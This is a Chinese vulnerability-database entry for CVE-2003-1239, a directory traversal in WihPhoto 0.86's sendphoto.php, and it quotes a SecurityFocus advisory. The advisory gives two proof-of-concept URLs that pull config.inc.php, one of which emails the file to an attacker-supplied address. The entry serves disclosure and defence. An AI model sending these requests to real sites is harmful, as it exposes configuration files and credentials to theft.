WihPhoto sendphoto.php文件泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107230 漏洞类型 路径遍历
发布时间 2003-02-24 更新时间 2006-01-03
CVE编号 CVE-2003-1239 CNNVD-ID CNNVD-200312-320
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22282
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-320
|漏洞详情
WihPhoto0.86版本的sendphoto.php存在目录遍历漏洞。远程攻击者借助album参数中的..标识符和pic参数中的目标文件读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment. 


http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
|参考资料

来源:BID
名称:6929
链接:http://www.securityfocus.com/bid/6929
来源:BUGTRAQ
名称:20030223WihPhoto(PHP)
链接:http://www.securityfocus.com/archive/1/312966
来源:VULNWATCH
名称:20030223WihPhoto(PHP)
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0092.html
来源:XF
名称:wihphoto-sendphoto-file-disclosure(11429)
链接:http://www.iss.net/security_center/static/11429.php